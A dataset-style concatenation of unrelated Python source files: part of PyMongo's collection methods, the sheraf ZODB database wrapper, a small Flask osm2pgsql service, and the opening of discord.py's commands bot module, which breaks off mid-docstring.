slave_ok, ReadPreference.PRIMARY) if full_response or not response.get('result'): return response elif isinstance(response['result'], dict): dbase = response['result']['db'] coll = response['result']['collection'] return self.__database.client[dbase][coll] else: return self.__database[response["result"]] def inline_map_reduce(self, map, reduce, full_response=False, **kwargs): """Perform an inline map/reduce operation on this collection. Perform the map/reduce operation on the server in RAM. A result collection is not created. The result set is returned as a list of documents. If `full_response` is ``False`` (default) returns the result documents in a list. Otherwise, returns the full response from the server to the `map reduce command`_. The :meth:`inline_map_reduce` method obeys the :attr:`read_preference` of this :class:`Collection`. :Parameters: - `map`: map function (as a JavaScript string) - `reduce`: reduce function (as a JavaScript string) - `full_response` (optional): if ``True``, return full response to this command - otherwise just return the result collection - `**kwargs` (optional): additional arguments to the `map reduce command`_ may be passed as keyword arguments to this helper method, e.g.:: >>> db.test.inline_map_reduce(map, reduce, limit=2) """ cmd = SON([("mapreduce", self.__name), ("map", map), ("reduce", reduce), ("out", {"inline": 1})]) cmd.update(kwargs) with self._socket_for_reads() as (sock_info, slave_ok): if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd: res = self._command(sock_info, cmd, slave_ok, read_concern=self.read_concern) else: res = self._command(sock_info, cmd, slave_ok) if full_response: return res else: return res.get("results") def __find_and_modify(self, filter, projection, sort, upsert=None, return_document=ReturnDocument.BEFORE, **kwargs): """Internal findAndModify helper.""" common.validate_is_mapping("filter", filter) if not isinstance(return_document, bool): raise ValueError("return_document must be " "ReturnDocument.BEFORE or ReturnDocument.AFTER") cmd = SON([("findAndModify", self.__name), ("query", filter), ("new", return_document)]) cmd.update(kwargs) if projection is not None: cmd["fields"] = helpers._fields_list_to_dict(projection, "projection") if sort is not None: cmd["sort"] = helpers._index_document(sort) if upsert is not None: common.validate_boolean("upsert", upsert) cmd["upsert"] = upsert with self._socket_for_writes() as sock_info: if sock_info.max_wire_version >= 4 and 'writeConcern' not in cmd: wc_doc = self.write_concern.document if wc_doc: cmd['writeConcern'] = wc_doc out = self._command(sock_info, cmd, read_preference=ReadPreference.PRIMARY, allowable_errors=[_NO_OBJ_ERROR]) _check_write_command_response([(0, out)]) return out.get("value") def find_one_and_delete(self, filter, projection=None, sort=None, **kwargs): """Finds a single document and deletes it, returning the document. >>> db.test.count({'x': 1}) 2 >>> db.test.find_one_and_delete({'x': 1}) {u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')} >>> db.test.count({'x': 1}) 1 If multiple documents match *filter*, a *sort* can be applied. >>> for doc in db.test.find({'x': 1}): ... print(doc) ... {u'x': 1, u'_id': 0} {u'x': 1, u'_id': 1} {u'x': 1, u'_id': 2} >>> db.test.find_one_and_delete( ... {'x': 1}, sort=[('_id', pymongo.DESCENDING)]) {u'x': 1, u'_id': 2} The *projection* option can be used to limit the fields returned. >>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False}) {u'x': 1} :Parameters: - `filter`: A query that matches the document to delete. - `projection` (optional): a list of field names that should be returned in the result document or a mapping specifying the fields to include or exclude. If `projection` is a list "_id" will always be returned. Use a mapping to exclude fields from the result (e.g. projection={'_id': False}). - `sort` (optional): a list of (key, direction) pairs specifying the sort order for the query. If multiple documents match the query, they are sorted and the first is deleted. - `**kwargs` (optional): additional command arguments can be passed as keyword arguments (for example maxTimeMS can be used with recent server versions). .. versionchanged:: 3.2 Respects write concern. .. warning:: Starting in PyMongo 3.2, this command uses the :class:`~pymongo.write_concern.WriteConcern` of this :class:`~pymongo.collection.Collection` when connected to MongoDB >= 3.2. Note that using an elevated write concern with this command may be slower compared to using the default write concern. .. versionadded:: 3.0 """ kwargs['remove'] = True return self.__find_and_modify(filter, projection, sort, **kwargs) def find_one_and_replace(self, filter, replacement, projection=None, sort=None, upsert=False, return_document=ReturnDocument.BEFORE, **kwargs): """Finds a single document and replaces it, returning either the original or the replaced document. The :meth:`find_one_and_replace` method differs from :meth:`find_one_and_update` by replacing the document matched by *filter*, rather than modifying the existing document. >>> for doc in db.test.find({}): ... print(doc) ... {u'x': 1, u'_id': 0} {u'x': 1, u'_id': 1} {u'x': 1, u'_id': 2} >>> db.test.find_one_and_replace({'x': 1}, {'y': 1}) {u'x': 1, u'_id': 0} >>> for doc in db.test.find({}): ... print(doc) ... {u'y': 1, u'_id': 0} {u'x': 1, u'_id': 1} {u'x': 1, u'_id': 2} :Parameters: - `filter`: A query that matches the document to replace. - `replacement`: The replacement document. - `projection` (optional): A list of field names that should be returned in the result document or a mapping specifying the fields to include or exclude. If `projection` is a list "_id" will always be returned. Use a mapping to exclude fields from the result (e.g. projection={'_id': False}). - `sort` (optional): a list of (key, direction) pairs specifying the sort order for the query. If multiple documents match the query, they are sorted and the first is replaced. - `upsert` (optional): When ``True``, inserts a new document if no document matches the query. Defaults to ``False``. - `return_document`: If :attr:`ReturnDocument.BEFORE` (the default), returns the original document before it was replaced, or ``None`` if no document matches. If :attr:`ReturnDocument.AFTER`, returns the replaced or inserted document. - `**kwargs` (optional): additional command arguments can be passed as keyword arguments (for example maxTimeMS can be used with recent server versions). .. versionchanged:: 3.2 Respects write concern. .. warning:: Starting in PyMongo 3.2, this command uses the :class:`~pymongo.write_concern.WriteConcern` of this :class:`~pymongo.collection.Collection` when connected to MongoDB >= 3.2. Note that using an elevated write concern with this command may be slower compared to using the default write concern. .. versionadded:: 3.0 """ common.validate_ok_for_replace(replacement) kwargs['update'] = replacement return self.__find_and_modify(filter, projection, sort, upsert, return_document, **kwargs) def find_one_and_update(self, filter, update, projection=None, sort=None, upsert=False, return_document=ReturnDocument.BEFORE, **kwargs): """Finds a single document and updates it, returning either the original or the updated document. >>> db.test.find_one_and_update( ... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}}) {u'_id': 665, u'done': False, u'count': 25}} By default :meth:`find_one_and_update` returns the original version of the document before the update was applied. To return the updated version of the document instead, use the *return_document* option. >>> from pymongo import ReturnDocument >>> db.example.find_one_and_update( ... {'_id': 'userid'}, ... {'$inc': {'seq': 1}}, ... return_document=ReturnDocument.AFTER) {u'_id': u'userid', u'seq': 1} You can limit the fields returned with the *projection* option. >>> db.example.find_one_and_update( ... {'_id': 'userid'}, ... {'$inc': {'seq': 1}}, ... projection={'seq': True, '_id': False}, ... return_document=ReturnDocument.AFTER) {u'seq': 2} The *upsert* option can be used to create the document if it doesn't already exist. >>> db.example.delete_many({}).deleted_count 1 >>> db.example.find_one_and_update( ... {'_id': 'userid'}, ... {'$inc': {'seq': 1}}, ... projection={'seq': True, '_id': False}, ... upsert=True, ... return_document=ReturnDocument.AFTER) {u'seq': 1} If multiple documents match *filter*, a *sort* can be applied. >>> for doc in db.test.find({'done': True}): ... print(doc) ... {u'_id': 665, u'done': True, u'result': {u'count': 26}} {u'_id': 701, u'done': True, u'result': {u'count': 17}} >>> db.test.find_one_and_update( ... {'done': True}, ... {'$set': {'final': True}}, ... sort=[('_id', pymongo.DESCENDING)]) {u'_id': 701, u'done': True, u'result': {u'count': 17}} :Parameters: - `filter`: A query that matches the document to update. - `update`: The update operations to apply. - `projection` (optional): A list of field names that should be returned in the result document or a mapping specifying the fields to include or exclude. If `projection` is a list "_id" will always be returned. Use a dict to exclude fields from the result (e.g. projection={'_id': False}). - `sort` (optional): a list of (key, direction) pairs specifying the sort order for the query. If multiple documents match the query, they are sorted and the first is updated. - `upsert` (optional): When ``True``, inserts a new document if no document matches the query. Defaults to ``False``. - `return_document`: If :attr:`ReturnDocument.BEFORE` (the default), returns the original document before it was updated, or ``None`` if no document matches. If :attr:`ReturnDocument.AFTER`, returns the updated or inserted document. - `**kwargs` (optional): additional command arguments can be passed as keyword arguments (for example maxTimeMS can be used with recent server versions). .. versionchanged:: 3.2 Respects write concern. .. warning:: Starting in PyMongo 3.2, this command uses the :class:`~pymongo.write_concern.WriteConcern` of this :class:`~pymongo.collection.Collection` when connected to MongoDB >= 3.2. Note that using an elevated write concern with this command may be slower compared to using the default write concern. .. versionadded:: 3.0 """ common.validate_ok_for_update(update) kwargs['update'] = update return self.__find_and_modify(filter, projection, sort, upsert, return_document, **kwargs) def save(self, to_save, manipulate=True, check_keys=True, **kwargs): """Save a document in this collection. **DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead. .. versionchanged:: 3.0 Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write operations. """ warnings.warn("save is deprecated. Use insert_one or replace_one " "instead", DeprecationWarning, stacklevel=2) common.validate_is_document_type("to_save", to_save) write_concern = None if kwargs: write_concern = WriteConcern(**kwargs) with self._socket_for_writes() as sock_info: if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save): return self._insert(sock_info, to_save, True, check_keys, manipulate, write_concern) else: self._update(sock_info, {"_id": to_save["_id"]}, to_save, True, check_keys, False, manipulate, write_concern) return to_save.get("_id") def insert(self, doc_or_docs, manipulate=True, check_keys=True, continue_on_error=False, **kwargs): """Insert a document(s) into this collection. **DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead. .. versionchanged:: 3.0 Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write operations. """ warnings.warn("insert is deprecated. Use insert_one or insert_many " "instead.", DeprecationWarning, stacklevel=2) write_concern = None if kwargs: write_concern = WriteConcern(**kwargs) with self._socket_for_writes() as sock_info: return self._insert(sock_info, doc_or_docs, not continue_on_error, check_keys, manipulate, write_concern) def update(self, spec, document, upsert=False, manipulate=False, multi=False, check_keys=True, **kwargs): """Update a document(s) in this collection. **DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or :meth:`update_many` instead. .. versionchanged:: 3.0 Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write operations. """ warnings.warn("update is deprecated. Use replace_one, update_one or " "update_many instead.", DeprecationWarning, stacklevel=2) common.validate_is_mapping("spec", spec) common.validate_is_mapping("document", document) if document: # If a top level key begins with '$' this is a modify operation # and we should skip key validation. It doesn't matter which key # we check here. Passing a document with a mix of top level keys # starting with and without a '$' is invalid and the server will # raise an appropriate exception. first = next(iter(document)) if first.startswith('$'): check_keys = False write_concern = None if kwargs: write_concern = WriteConcern(**kwargs) with self._socket_for_writes() as sock_info: return self._update(sock_info, spec, document, upsert, check_keys, multi, manipulate, write_concern) def remove(self, spec_or_id=None, multi=True, **kwargs): """Remove a document(s) from this collection. **DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead. .. versionchanged:: 3.0 Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write operations. """ warnings.warn("remove is deprecated. Use delete_one or delete_many " "instead.", DeprecationWarning, stacklevel=2) if spec_or_id is None: spec_or_id = {} if not isinstance(spec_or_id, collections.Mapping): spec_or_id = {"_id": spec_or_id} write_concern = None if kwargs: write_concern = WriteConcern(**kwargs) with self._socket_for_writes() as sock_info: return self._delete(sock_info, spec_or_id, multi, write_concern) def find_and_modify(self, query={}, update=None, upsert=False, sort=None, full_response=False, manipulate=False, **kwargs): """Update and return an object. **DEPRECATED** - Use :meth:`find_one_and_delete`, :meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead. """ warnings.warn("find_and_modify is deprecated, use find_one_and_delete" ", find_one_and_replace, or find_one_and_update instead", DeprecationWarning, stacklevel=2) if not update and not kwargs.get('remove', None): raise ValueError("Must either update or remove") if update and kwargs.get('remove', None): raise ValueError("Can't do both update and remove") # No need to include empty args if query: kwargs['query'] = query if update: kwargs['update'] = update if upsert: kwargs['upsert'] = upsert if sort: # Accept a list of tuples to match Cursor's sort parameter. if isinstance(sort, list): kwargs['sort'] = helpers._index_document(sort) # Accept OrderedDict, SON, and dict with len == 1 so we # don't break existing code already using find_and_modify. elif (isinstance(sort, _ORDERED_TYPES) or isinstance(sort, dict) and len(sort) == 1): warnings.warn("Passing mapping types for `sort` is deprecated," " use a list of (key, direction) pairs instead", DeprecationWarning, stacklevel=2) kwargs['sort'] = sort else: raise TypeError("sort must be a list of (key, direction) " "pairs, a dict of len 1, or an instance of " "SON or OrderedDict") fields = kwargs.pop("fields", None) if fields is not None: kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields") cmd = SON([("findAndModify", self.__name)]) cmd.update(kwargs) with self._socket_for_writes() as sock_info: if sock_info.max_wire_version >= 4 and 'writeConcern' not in cmd: wc_doc = self.write_concern.document if wc_doc: cmd['writeConcern'] = wc_doc out = self._command(sock_info, cmd, read_preference=ReadPreference.PRIMARY, allowable_errors=[_NO_OBJ_ERROR]) _check_write_command_response([(0, out)]) if not out['ok']: if out["errmsg"] == _NO_OBJ_ERROR: return None else: # Should never get here b/c of allowable_errors raise ValueError("Unexpected Error: %s" % (out,)) if full_response: return out else: document = out.get('value') if manipulate: document = self.__database._fix_outgoing(document, self) return document def __iter__(self): return self def __next__(self): raise TypeError("'Collection' object is not iterable") next = __next__ def __call__(self, *args, **kwargs): """This is only here so that some API misusages are easier to debug. """ if "." not in self.__name: raise TypeError("'Collection' object is not callable. If you " "meant to call the '%s' method on a 'Database' " "object it is failing because no such method " "exists." % self.__name) raise TypeError("'Collection' object is not callable. If you meant to " "call the '%s' method on a 'Collection' object it is " "failing because no such method exists." % self.__name.split(".")[-1])
42.694197
91
0.58049
4ee41c96ec0c98673051bf2f3ed7cd9d587ad32a
13,191
py
Python
sheraf/databases.py
yaal-fr/sheraf
9821a53d8b0ea0aba420175e4cfa81529262f88c
[ "MIT" ]
1
2020-03-18T09:54:52.000Z
2020-03-18T09:54:52.000Z
sheraf/databases.py
yaal-fr/sheraf
9821a53d8b0ea0aba420175e4cfa81529262f88c
[ "MIT" ]
null
null
null
sheraf/databases.py
yaal-fr/sheraf
9821a53d8b0ea0aba420175e4cfa81529262f88c
[ "MIT" ]
null
null
null
import contextlib import os import traceback from contextvars import ContextVar import transaction import ZODB.config import ZODB.DB import zodburi from ZODB.DemoStorage import DemoStorage from sheraf.exceptions import ConnectionAlreadyOpened # Isolated contexts state global_context_connections_state = ContextVar("global_context_connections_state") global_context_last_connection_state = ContextVar( "global_context_last_connection_state" ) class LocalData: instance = None def __init__(self, pid=None): self.pid = pid or os.getpid() self.databases = {} self.last_database_context = {} self.zodb_databases = {} class GlobalThreadContext: @property def connections(self): try: return global_context_connections_state.get() except LookupError: global_context_connections_state.set([]) return global_context_connections_state.get() @property def last_connection_context(self): try: return global_context_last_connection_state.get() except LookupError: global_context_last_connection_state.set(None) return global_context_last_connection_state.get() @last_connection_context.setter def last_connection_context(self, value): global_context_last_connection_state.set(value) def reset_connections_state(self): global_context_connections_state.set([]) global_context_last_connection_state.set(None) self.thread_context = GlobalThreadContext() @classmethod def get(cls): # TODO: put a lock on pid pid = os.getpid() if not cls.instance or cls.instance.pid != pid: cls.instance = LocalData(pid) return cls.instance # Isolated context state database_context_connections_state = ContextVar("database_context_connections_state") class Database(object): """A ZODB :class:`ZODB.DB` wrapper with a :class:`ZODB.interfaces.IStorage` factory. The storage factory will either create a :class:`~ZEO.ClientStorage.ClientStorage`, a :class:`~ZODB.FileStorage.FileStorage.FileStorage`, a :class:`~ZODB.DemoStorage.DemoStorage`, a Relstorage :class:`~relstorage.adapters.postgresql.adapter.PostgreSQLAdapter` or use a user defined storage depending on the argument passed at the initialization of the object. A Storage object is created and pass it to the :class:`ZODB.DB` constructor Several connections can be used at the same time. The connections are identified by their name. :param database_name: The name of the connection. :param storage: If set, this user defined storage will be used. :param uri: A zodburi to the database. :type uri: An URI that will be parsed by :func:`zodburi.resolve_uri`. :param db_args: Arguments to pass to the :class:`ZODB.DB`. :param nestable: If `False`, will raise a :class:`~sheraf.exceptions.ConnectionAlreadyOpened` if a connection has already been opened. """ DEFAULT_DATABASE_NAME = "unnamed" def __init__(self, uri=None, storage=None, nestable=False, db_args=None): self.nestable = nestable self.uri = uri self.db = None self.storage = None self.db_args = db_args or {} class DatabaseThreadContext: @property def connections(self): try: return database_context_connections_state.get() except LookupError: database_context_connections_state.set([]) return database_context_connections_state.get() def reset_connections_state(self): database_context_connections_state.set([]) self.thread_context = DatabaseThreadContext() self.db_args["databases"] = LocalData.get().zodb_databases self.reset(storage, uri) stack = traceback.extract_stack()[-2] LocalData.get().last_database_context[self.name] = ( stack.filename, stack.lineno, ) def __repr__(self): description = "<Database database_name='{}'".format(self.name) if self.db_args.get("read_only", False): description += " ro" if self.nestable: description += " nestable" description += ">" return description def reset(self, storage=None, uri=None): """Close and reopen a database connection.""" if self.db: self.close() if storage is not None: self.storage = storage elif uri: storage_factory, db_args = zodburi.resolve_uri(uri) self.storage = storage_factory() db_args.update(self.db_args) self.db_args = db_args else: self.storage = DemoStorage() self.name = self.db_args.get("database_name", Database.DEFAULT_DATABASE_NAME) if self.name in LocalData.get().databases: last_context = LocalData.get().last_database_context.get(self.name) raise KeyError( "A database named '{}' already exists. Last opening was on {} at line {}".format( self.name, last_context[0], last_context[1] ) if last_context else "A database named '{}' already exists.".format(self.name) ) self.db = ZODB.DB(self.storage, **self.db_args) LocalData.get().databases[self.name] = self def connection_open(self): """Opens a connection. Returns a connection to this database. If `nestable` is set and a connection has already been opened, raises a :class:`~sheraf.exceptions.ConnectionAlreadyOpened` exception. If `nestable` is False and a connection has already been opened, it returns a new connection with a new transaction_manager. :return: A :class:`~ZODB.Connection.Connection` object. """ data = LocalData.get() # No other connection exists if not Database.last_connection(): connection = self.db.open() # A connection to this database exists, and the second one is not allowed. elif not self.nestable: message = ( "First connection was {} on {} at line {}".format( Database.last_connection(), *data.thread_context.last_connection_context ) if data.thread_context.last_connection_context else "First connection was {}".format(Database.last_connection()) ) raise ConnectionAlreadyOpened(message) # A connection to this database exists, and the second one is allowed, but # with a new transaction manager. else: connection = self.db.open( transaction_manager=transaction.TransactionManager() ) self.thread_context.connections.append(connection) data.thread_context.connections.append(connection) return connection def connection_close(self, connection=None): """Closes a connection opened on the database. :param connection: The connection to close, if `None` the last connection opened on the database is closed. """ connection = connection or Database.last_connection(self) if connection.opened: connection.close() if connection in LocalData.get().thread_context.connections: LocalData.get().thread_context.connections.remove(connection) if connection in self.thread_context.connections: self.thread_context.connections.remove(connection) def close(self): """Closes the database.""" data = LocalData.get() for connection in list(self.thread_context.connections): if connection and connection.opened: connection.close() data.thread_context.connections.remove(connection) self.thread_context.connections.remove(connection) if self.db: self.db.close() if self.name in data.databases: del data.databases[self.name] if self.name in data.zodb_databases: del data.zodb_databases[self.name] if self.name in data.last_database_context: del data.last_database_context[self.name] self.db = None self.storage = None @contextlib.contextmanager def connection( self, commit=False, cache_minimize=False, reuse=False, _trackeback_shift=0 ): """A context manager opening a connection on this database. :param commit: Whether to commit the transaction when leaving the context manager. :type commit: boolean :param cache_minimize: Whether to call :func:`ZODB.Connection.Connection.cache_minimize` when leaving the context manager. :type cache_minimize: boolean :param reuse: If a connection is already opened, reuse it. :type reuse: boolean >>> database = sheraf.Database() >>> with database.connection() as connection: ... sheraf.Database.current_connection() is connection True """ if reuse and Database.last_connection(self): yield Database.last_connection(self) return _connection = self.connection_open() if not self.nestable: stack = traceback.extract_stack()[-3 - _trackeback_shift] LocalData.get().thread_context.last_connection_context = ( stack.filename, stack.lineno, ) try: yield _connection if commit: _connection.transaction_manager.commit() except BaseException: if commit and _connection.transaction_manager: _connection.transaction_manager.abort() raise finally: # TODO: to be changed with try/except NoTransaction when upgrading transaction>2.0 @cedric if not commit and _connection.transaction_manager: _connection.transaction_manager.abort() if cache_minimize: for conn in _connection.connections.values(): conn.cacheMinimize() self.connection_close(_connection) @classmethod def last_connection(cls, database=None): if database: return ( database.thread_context.connections[-1] if database.thread_context.connections else None ) return ( LocalData.get().thread_context.connections[-1] if LocalData.get().thread_context.connections else None ) @classmethod def current_connection(cls, database_name=None): if not Database.last_connection(): return None if not database_name: return Database.last_connection() return Database.last_connection().get_connection(database_name) @classmethod def current_name(cls): if Database.last_connection(): return Database.last_connection().db().database_name return None @classmethod def all(cls): """ :return: A list containing all the existing :class:`Database` in a tuple `(name, Database)`. """ return LocalData.get().databases.items() @classmethod def get(cls, database_name=None): """ :param database_name: The name of the queried database. :return: The database object if it exists. A :class:`KeyError` is raised elsewise. """ database_name = database_name or Database.DEFAULT_DATABASE_NAME try: return LocalData.get().databases[database_name] except KeyError: raise KeyError("No database named '{}'.".format(database_name)) @classmethod def get_or_create(cls, **kwargs): """ :return: The database object if it exists. If the database does not exist, it is created with the `kwargs` arguments. """ try: return Database.get(database_name=kwargs.get("database_name")) except KeyError: return Database(**kwargs) @contextlib.contextmanager def connection(database_name=None, commit=False, cache_minimize=False, reuse=False): """ Shortcut for :meth:`sheraf.databases.Database.connection` :param database_name: The name of the database on which to open a connection. If not set, the default database will be used. :param *kwargs: See :meth:`sheraf.databases.Database.connection` arguments. """ database = Database.get(database_name) with database.connection( commit=commit, cache_minimize=cache_minimize, reuse=reuse, _trackeback_shift=2, ) as conn: yield conn
33.910026
125
0.627852
62f6c3e9d67d2ffec74359366959a98bb2427112
811
py
Python
roles/osm2pgsql/templates/main.j2.py
cobra79/GeoGeekSuite
fc8e43a9e8dffa6b41b5b4671f674bee6f60785d
[ "Apache-2.0" ]
null
null
null
roles/osm2pgsql/templates/main.j2.py
cobra79/GeoGeekSuite
fc8e43a9e8dffa6b41b5b4671f674bee6f60785d
[ "Apache-2.0" ]
null
null
null
roles/osm2pgsql/templates/main.j2.py
cobra79/GeoGeekSuite
fc8e43a9e8dffa6b41b5b4671f674bee6f60785d
[ "Apache-2.0" ]
null
null
null
import cobra.helper.logging as logging import cobra.tools.osm2pgsql as osm from flask import Flask, request, jsonify app = Flask(__name__) l = logging.Logger('Osm2pgsql Flask') l.debug('Start Cobra Logging') #TODO: Schema handling osm.Osm2PgSql(run_in_loop = True) @app.route('/') def hello_world(): l.debug('hello osm') return 'Hello, osm!' #@app.route('/load_shape', methods=['POST']) #def load_shape(): # app.logger.info('load_shape') # data = request.json # g = cobra_gdal.cobra_gdal() # try: # app.logger.debug(data) # #app.logger.info(f'{data['path']}') # g.shape2pg(data.get('path')) # except Exception as inst: # app.logger.error(inst) # finally: # return jsonify(data) if __name__ == '__main__': app.run(debug=True, host='0.0.0.0')
24.575758
44
0.649815
cba7d1e0ad8a18494f02f0bc44fe38a363db76b4
37,033
py
Python
discord/ext/commands/bot.py
ToxicKidz/discord.py
bba4d6c4e4df418ba98d46a95c3f472a67a042b6
[ "MIT" ]
13
2020-12-16T06:13:11.000Z
2021-04-15T12:01:38.000Z
discord/ext/commands/bot.py
ToxicKidz/discord.py
bba4d6c4e4df418ba98d46a95c3f472a67a042b6
[ "MIT" ]
1
2022-02-26T08:28:44.000Z
2022-02-26T08:28:44.000Z
discord/ext/commands/bot.py
ToxicKidz/discord.py
bba4d6c4e4df418ba98d46a95c3f472a67a042b6
[ "MIT" ]
6
2020-12-16T00:01:24.000Z
2021-02-05T12:32:54.000Z
""" The MIT License (MIT) Copyright (c) 2015-present Rapptz Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import asyncio import collections import inspect import importlib.util import sys import traceback import types import discord from .core import GroupMixin from .view import StringView from .context import Context from . import errors from .help import HelpCommand, DefaultHelpCommand from .cog import Cog __all__ = ( 'when_mentioned', 'when_mentioned_or', 'Bot', 'AutoShardedBot', ) def when_mentioned(bot, msg): """A callable that implements a command prefix equivalent to being mentioned. These are meant to be passed into the :attr:`.Bot.command_prefix` attribute. """ return [f'<@{bot.user.id}> ', f'<@!{bot.user.id}> '] def when_mentioned_or(*prefixes): """A callable that implements when mentioned or other prefixes provided. These are meant to be passed into the :attr:`.Bot.command_prefix` attribute. Example -------- .. code-block:: python3 bot = commands.Bot(command_prefix=commands.when_mentioned_or('!')) .. note:: This callable returns another callable, so if this is done inside a custom callable, you must call the returned callable, for example: .. code-block:: python3 async def get_prefix(bot, message): extras = await prefixes_for(message.guild) # returns a list return commands.when_mentioned_or(*extras)(bot, message) See Also ---------- :func:`.when_mentioned` """ def inner(bot, msg): r = list(prefixes) r = when_mentioned(bot, msg) + r return r return inner def _is_submodule(parent, child): return parent == child or child.startswith(parent + ".") class _DefaultRepr: def __repr__(self): return '<default-help-command>' _default = _DefaultRepr() class BotBase(GroupMixin): def __init__(self, command_prefix, help_command=_default, description=None, **options): super().__init__(**options) self.command_prefix = command_prefix self.extra_events = {} self.__cogs = {} self.__extensions = {} self._checks = [] self._check_once = [] self._before_invoke = None self._after_invoke = None self._help_command = None self.description = inspect.cleandoc(description) if description else '' self.owner_id = options.get('owner_id') self.owner_ids = options.get('owner_ids', set()) self.strip_after_prefix = options.get('strip_after_prefix', False) if self.owner_id and self.owner_ids: raise TypeError('Both owner_id and owner_ids are set.') if self.owner_ids and not isinstance(self.owner_ids, collections.abc.Collection): raise TypeError(f'owner_ids must be a collection not {self.owner_ids.__class__!r}') if help_command is _default: self.help_command = DefaultHelpCommand() else: self.help_command = help_command # internal helpers def dispatch(self, event_name, *args, **kwargs): super().dispatch(event_name, *args, **kwargs) ev = 'on_' + event_name for event in self.extra_events.get(ev, []): self._schedule_event(event, ev, *args, **kwargs) async def close(self): for extension in tuple(self.__extensions): try: self.unload_extension(extension) except Exception: pass for cog in tuple(self.__cogs): try: self.remove_cog(cog) except Exception: pass await super().close() async def on_command_error(self, context, exception): """|coro| The default command error handler provided by the bot. By default this prints to :data:`sys.stderr` however it could be overridden to have a different implementation. This only fires if you do not specify any listeners for command error. """ if self.extra_events.get('on_command_error', None): return command = context.command if command and command.has_error_handler(): return cog = context.cog if cog and cog.has_error_handler(): return print(f'Ignoring exception in command {context.command}:', file=sys.stderr) traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr) # global check registration def check(self, func): r"""A decorator that adds a global check to the bot. A global check is similar to a :func:`.check` that is applied on a per command basis except it is run before any command checks have been verified and applies to every command the bot has. .. note:: This function can either be a regular function or a coroutine. Similar to a command :func:`.check`\, this takes a single parameter of type :class:`.Context` and can only raise exceptions inherited from :exc:`.CommandError`. Example --------- .. code-block:: python3 @bot.check def check_commands(ctx): return ctx.command.qualified_name in allowed_commands """ self.add_check(func) return func def add_check(self, func, *, call_once=False): """Adds a global check to the bot. This is the non-decorator interface to :meth:`.check` and :meth:`.check_once`. Parameters ----------- func The function that was used as a global check. call_once: :class:`bool` If the function should only be called once per :meth:`.invoke` call. """ if call_once: self._check_once.append(func) else: self._checks.append(func) def remove_check(self, func, *, call_once=False): """Removes a global check from the bot. This function is idempotent and will not raise an exception if the function is not in the global checks. Parameters ----------- func The function to remove from the global checks. call_once: :class:`bool` If the function was added with ``call_once=True`` in the :meth:`.Bot.add_check` call or using :meth:`.check_once`. """ l = self._check_once if call_once else self._checks try: l.remove(func) except ValueError: pass def check_once(self, func): r"""A decorator that adds a "call once" global check to the bot. Unlike regular global checks, this one is called only once per :meth:`.invoke` call. Regular global checks are called whenever a command is called or :meth:`.Command.can_run` is called. This type of check bypasses that and ensures that it's called only once, even inside the default help command. .. note:: When using this function the :class:`.Context` sent to a group subcommand may only parse the parent command and not the subcommands due to it being invoked once per :meth:`.Bot.invoke` call. .. note:: This function can either be a regular function or a coroutine. Similar to a command :func:`.check`\, this takes a single parameter of type :class:`.Context` and can only raise exceptions inherited from :exc:`.CommandError`. Example --------- .. code-block:: python3 @bot.check_once def whitelist(ctx): return ctx.message.author.id in my_whitelist """ self.add_check(func, call_once=True) return func async def can_run(self, ctx, *, call_once=False): data = self._check_once if call_once else self._checks if len(data) == 0: return True return await discord.utils.async_all(f(ctx) for f in data) async def is_owner(self, user): """|coro| Checks if a :class:`~discord.User` or :class:`~discord.Member` is the owner of this bot. If an :attr:`owner_id` is not set, it is fetched automatically through the use of :meth:`~.Bot.application_info`. .. versionchanged:: 1.3 The function also checks if the application is team-owned if :attr:`owner_ids` is not set. Parameters ----------- user: :class:`.abc.User` The user to check for. Returns -------- :class:`bool` Whether the user is the owner. """ if self.owner_id: return user.id == self.owner_id elif self.owner_ids: return user.id in self.owner_ids else: app = await self.application_info() if app.team: self.owner_ids = ids = {m.id for m in app.team.members} return user.id in ids else: self.owner_id = owner_id = app.owner.id return user.id == owner_id def before_invoke(self, coro): """A decorator that registers a coroutine as a pre-invoke hook. A pre-invoke hook is called directly before the command is called. This makes it a useful function to set up database connections or any type of set up required. This pre-invoke hook takes a sole parameter, a :class:`.Context`. .. note:: The :meth:`~.Bot.before_invoke` and :meth:`~.Bot.after_invoke` hooks are only called if all checks and argument parsing procedures pass without error. If any check or argument parsing procedures fail then the hooks are not called. Parameters ----------- coro: :ref:`coroutine <coroutine>` The coroutine to register as the pre-invoke hook. Raises ------- TypeError The coroutine passed is not actually a coroutine. """ if not asyncio.iscoroutinefunction(coro): raise TypeError('The pre-invoke hook must be a coroutine.') self._before_invoke = coro return coro def after_invoke(self, coro): r"""A decorator that registers a coroutine as a post-invoke hook. A post-invoke hook is called directly after the command is called. This makes it a useful function to clean-up database connections or any type of clean up required. This post-invoke hook takes a sole parameter, a :class:`.Context`. .. note:: Similar to :meth:`~.Bot.before_invoke`\, this is not called unless checks and argument parsing procedures succeed. This hook is, 